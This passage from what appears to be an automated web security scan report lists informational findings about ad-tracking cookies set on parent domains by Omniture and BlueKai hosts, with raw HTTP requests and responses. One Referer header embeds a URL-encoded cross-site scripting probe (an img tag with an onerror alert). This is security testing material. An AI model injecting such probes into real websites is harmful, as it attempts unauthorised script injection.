Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:32:32 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B10E0[CE]; Expires=Tue, 2 Feb 2016 20:32:32 GMT; Domain=.2o7.net; Path=/
Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s01692645419389?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 20:32:32 GMT
Last-Modified: Fri, 04 Feb 2011 20:32:32 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www354
Content-Length: 0
Content-Type: text/plain
Connection: close


12.82. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s03453267652075  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /b/ss/superpagesadvert/1/H.14/s03453267652075

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/superpagesadvert/1/H.14/s03453267652075 HTTP/1.1
Host: superpages.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:50:13 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/
Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s03453267652075?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 19:50:13 GMT
Last-Modified: Fri, 04 Feb 2011 19:50:13 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www379
Content-Length: 0
Content-Type: text/plain
Connection: close


12.83. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s04304838050156  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /b/ss/superpagesadvert/1/H.14/s04304838050156

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/superpagesadvert/1/H.14/s04304838050156 HTTP/1.1
Host: superpages.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:50:13 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/
Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s04304838050156?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 19:50:13 GMT
Last-Modified: Fri, 04 Feb 2011 19:50:13 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www298
Content-Length: 0
Content-Type: text/plain
Connection: close


12.84. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07192756696604  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /b/ss/superpagesadvert/1/H.14/s07192756696604

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/superpagesadvert/1/H.14/s07192756696604 HTTP/1.1
Host: superpages.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:50:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F1[CE]; Expires=Tue, 2 Feb 2016 19:50:09 GMT; Domain=.2o7.net; Path=/
Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07192756696604?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 19:50:09 GMT
Last-Modified: Fri, 04 Feb 2011 19:50:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 0
Content-Type: text/plain
Connection: close


12.85. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07964217748958  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /b/ss/superpagesadvert/1/H.14/s07964217748958

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/superpagesadvert/1/H.14/s07964217748958 HTTP/1.1
Host: superpages.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:19:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4AFFAE[CE]; Expires=Tue, 2 Feb 2016 19:19:10 GMT; Domain=.2o7.net; Path=/
Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07964217748958?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 19:19:10 GMT
Last-Modified: Fri, 04 Feb 2011 19:19:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www262
Content-Length: 0
Content-Type: text/plain
Connection: close


12.86. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s081445949617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /b/ss/superpagesadvert/1/H.14/s081445949617

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/superpagesadvert/1/H.14/s081445949617 HTTP/1.1
Host: superpages.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:50:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F2[CE]; Expires=Tue, 2 Feb 2016 19:50:10 GMT; Domain=.2o7.net; Path=/
Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s081445949617?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 19:50:10 GMT
Last-Modified: Fri, 04 Feb 2011 19:50:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www384
Content-Length: 0
Content-Type: text/plain
Connection: close


12.87. http://tags.bluekai.com/site/2174  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2174

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2174 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=s/wmp1UR22QsHNJo; bkc=KJh566N/PaWDOded7x2N7OALjoWPDh9bZC9PYkjup+eYs7C2xJusVm/c+OY7BCVk/TC/jJLvtAPONAvyyWUHNtJG6uT/CsezOOWsWVlDxvpmKKd55I4zpUFXKm4MzL28dxgGMxOdUI2p/iQDILAwqhrUSTOwkTcRV+bCEtOdcJUZ4mt71SOoesCRpM+CvB4lgAF4+zp8tF4MxaVBx+r0PTI2jpIWmPbfPmF8bC4M/lcoH1ATHL8Bu92mug2dRwy0urTO8ZTzelyinLl2+52u4GEbkSXjEIIu87C+fL4Fb4GrNlwI2dUDqiKvN9ufR6obRzaTiJJZB2w1rGbbIKy7kgZK5GAKpfzODpzfbqTlb+MpkMkKK6zubs8DKaU1AodPL72Z/1pht74/o2LD1k50EQJqyO8rkmjTfUcS7tipyAT07Td2QFSg6FmVmP2fo+gpY+NcYnXstJN26k7nbEcMVjgk/53l4pXmrdURO0hp4Vtb4G0uFNUTArPK0pumy1m6nTF7Q12nOywUJbD8UprjGc2hAXvcR7FQ+uooM+zIxd4E1Qv1MOLlVIjTfqwIKDdbnFg2YtcMY8qd5OFlCnlTBbatZ7d/2VHSIksg2swn8p13Xs2ddfIsFwgLDlcoX/g6EnDvUm4w3NpC4vF62NUoNcRPsw8IerN+Yj0fJqlRG/E4jSulBAkljvVwVD84BwTw/Leb1Q==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:52:27 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 04 Feb 2011 20:52:27 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=hgA1oXUR22QsHNJo; expires=Tue, 02-Aug-2011 20:52:27 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh566N/PaWDOded4EmMMMmehu00RCJYhyI/YQDgvV5GRxtXwiOvx0GoCHqiNvSi59xHiVhExqLG0aG/agQGIkG1n5GaQHY1Z0eY/vvBsDx48fplfg+pfrR24+hpf7Zzz2bx9QSMyBXUm2yGiLDCXg6qhoDbTw6a/n8VzmA/fc5M6o0FduQm+/TepuLaBynkI4RPbPrVmPdfEQvG3PwGVFcFRtdqYVsmN0fUIff66UC4xMojBGbEX8wu8bSAl2yN4CRMeyepPyIswoux8FgSg0QduFD3kTN7+AopFeqUTd51R8d7IKeX5fg5MuW20Kbjkk8zBObZon7NBnmIdPTIIbakFAIfE/X7ZTeoSflDfpXBf9UncvI2JxU6+0QXnIU/MIFjlf/x87M+ZIuMUxgjilAlixNQMfH/zfptOmNwgWtCiK0Q3jl2kwSgtQrVmP2f++qlvFUey4KpfB8E6M7nZUcMmjgkc+3l4NdlKFNCffn12t+EIpasdkpkX8Rcn51TxGdxFi059eTLfyf5ZJnZ4mNDAFfa5xoFu2tCNt3AmPffswV7RhxR7EOrLXphtLKefp6zrOEDn6S1ENFINVXXWwcMUpg5BcdcXNHsI7b729wnJf132/2QdpX8dFlL/y7o0vg6qv6vlHe13Nnkx346k8dubz63B/n2cBfKWEodUU3oVxZdpAoFqJUr0DA4LJy8Rdy45E7fPQ==; expires=Tue, 02-Aug-2011 20:52:27 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 20:52:27 GMT; path=/; domain=.bluekai.com
BK-Server: 1c6d
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

12.88. http://tags.bluekai.com/site/2491  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2491

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2491?ss_rand=637007605 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=hgA1oXUR22QsHNJo; bkc=KJh566N/PaWDOded4EmMMMmehu00RCJYhyI/YQDgvV5GRxtXwiOvx0GoCHqiNvSi59xHiVhExqLG0aG/agQGIkG1n5GaQHY1Z0eY/vvBsDx48fplfg+pfrR24+hpf7Zzz2bx9QSMyBXUm2yGiLDCXg6qhoDbTw6a/n8VzmA/fc5M6o0FduQm+/TepuLaBynkI4RPbPrVmPdfEQvG3PwGVFcFRtdqYVsmN0fUIff66UC4xMojBGbEX8wu8bSAl2yN4CRMeyepPyIswoux8FgSg0QduFD3kTN7+AopFeqUTd51R8d7IKeX5fg5MuW20Kbjkk8zBObZon7NBnmIdPTIIbakFAIfE/X7ZTeoSflDfpXBf9UncvI2JxU6+0QXnIU/MIFjlf/x87M+ZIuMUxgjilAlixNQMfH/zfptOmNwgWtCiK0Q3jl2kwSgtQrVmP2f++qlvFUey4KpfB8E6M7nZUcMmjgkc+3l4NdlKFNCffn12t+EIpasdkpkX8Rcn51TxGdxFi059eTLfyf5ZJnZ4mNDAFfa5xoFu2tCNt3AmPffswV7RhxR7EOrLXphtLKefp6zrOEDn6S1ENFINVXXWwcMUpg5BcdcXNHsI7b729wnJf132/2QdpX8dFlL/y7o0vg6qv6vlHe13Nnkx346k8dubz63B/n2cBfKWEodUU3oVxZdpAoFqJUr0DA4LJy8Rdy45E7fPQ==; bkdc=res

Response

HTTP/1.0 302 Moved Temporarily
Date: Thu, 03 Feb 2011 21:07:36 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Location: http://dt.scanscout.com/ssframework/dt/pt.png?trackcd=1288991585470
Set-Cookie: bk=qJ0MDVVZbt/sHNJo; expires=Tue, 02-Aug-2011 21:07:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh566N/PaWDOded7x2N7OALj+aREWnGI9aHGV9k8xy+g/7o9b/6o92vGRU1NvSA59xHiVhExqLG0aG/agQGZZGhrVQUOW/yqR//QTQtjCO27wwKrI2bfrR24gpdrKK2KITgHTeaDuejKeYF9JEJq0ywCGpcbTOyZ6nEoVyIQvjt2+1YCmz+zfltVKUbfTF+IHYvH4S2sXjP0gIfYWHVz6Td2+rYBB5gwbnlSh6eZo5pIuYDT2rM6gzLzflt7uCxDb4x+K0rh2bb9XvzNbfDrffXyUCFPeoV1RbxLhwu80KkU2XN4CRZeyOpPydTwCuP8FfSnbAIHwt3PT07+6CpUoFfXU6btK5Tp7FIm2sKe01hyKbjAk8R1ObiG+7NBnmI4DT2IbakUAIfxoz7sTsoSft6llXStwmVmSI2mxf6+0QXntU/MIFjl2/x8gptE4nHnGD67SXRBG92lYnBKKtjV+zg2e6O4edcfM6k7qszsMmKoP7LoFw0fILK8dFRm0lpI+364uixwbdhOzrekZAf4xdEFJ5m9mXdfFv5MW+pFURXHFdumGUaDg4FNHoopZL4GdIoRyxRsE5rLXh8fKwKIhftUwnbaTwso0ldbMzKYng8z3Yq8C5ywJZuF+Xodze00qE0dz1fF8XYfFgL/NcoT/g6Evl0lKeB3fgsrDfonpIkW8rDqlM7StCqCIdL5KZkjiUXvil5tYg5A8cKqpkNhFQds89Yb9==; expires=Tue, 02-Aug-2011 21:07:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJpMTsPQAJe62ZPAWmPMRnC3fxhA3xnadgI6Oq/ZLEWyw9s0tOiXKuWLHQR8wCMgekeLm818AYDJaWFPNyv09JtgWxy=; expires=Tue, 02-Aug-2011 21:07:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeiItK1DQ2DeZe/OOnucgf4gN2FqcRgzDKHQ1P9ND/VE9yPYr8a3TyHPRwzGIqSi7En/8LKIFfdglEXTgLyXe3guyjs9fIYmxXMSnIwNe2gf3LwuVE1IhC5e8xwE1eaNe2AF7KmjGV/BKOlmdRy9YZD8Gjsn8MXzzrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9/usgtT=; expires=Tue, 02-Aug-2011 21:07:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 21:07:36 GMT; path=/; domain=.bluekai.com
BK-Server: 3550
Content-Length: 0
Content-Type: text/html
Connection: keep-alive


12.89. http://tags.bluekai.com/site/353  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/353

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/353?rand=0.9526619226671755 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/videoegg/ad.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; 